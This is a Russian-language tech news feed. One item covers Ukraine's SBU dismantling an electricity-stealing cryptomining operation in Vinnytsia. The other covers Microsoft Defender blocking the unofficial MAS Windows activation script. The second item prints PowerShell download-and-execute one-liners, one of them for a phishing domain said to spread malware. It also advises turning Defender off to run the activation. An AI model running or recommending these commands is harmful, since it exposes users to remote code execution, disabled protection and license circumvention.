СБУ остановила крупнейшую криптомайнинговую операцию в стране

СБУ остановила крупнейшую криптомайнинговую операцию в стране

СБУ остановила крупнейшую криптомайнинговую операцию в стране

Украинские правоохранители ликвидировали масштабную операцию по добыче цифровой валюты. Полицейские изъяли 5 тыс. компьютеров и 3800 игровых консолей, участвовавших в этой операции — это крупнейшая на данный момент криптомайнинговая кампания, выявленная в стране.

Злоумышленники базировались в городе Винница, умудряясь каждый месяц воровать электроэнергию на сумму 259 300 долларов. Чтобы как-то скрыть эту активность, преступники использовали липовые показатели счётчиков электроэнергии, не отражающие реального потребления.

«Деятельность злоумышленников могла привести к скачкам напряжения и оставить население без электроэнергии», — пишет Служба безопасности Украины (СБУ).

Также правоохранители отметили, что уголовное дело возбудили по факту кражи воды, электроэнергии и тепловой энергии. Операцию криптомайнинга организовали жители Киева и Винницы, которая находится в трёх часах езды от столицы.

Следователи опубликовали снимки, на которых видна огромная производственная комната, уставленная от стены до стены конструкцией из стальных стеллажей, в которых хранились компьютеры и игровые приставки PlayStation.

 

Помимо этого, полиция изъяла более 500 видеокарт, 50 процессоров, а также ноутбуки, смартфоны и жёсткие диски.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru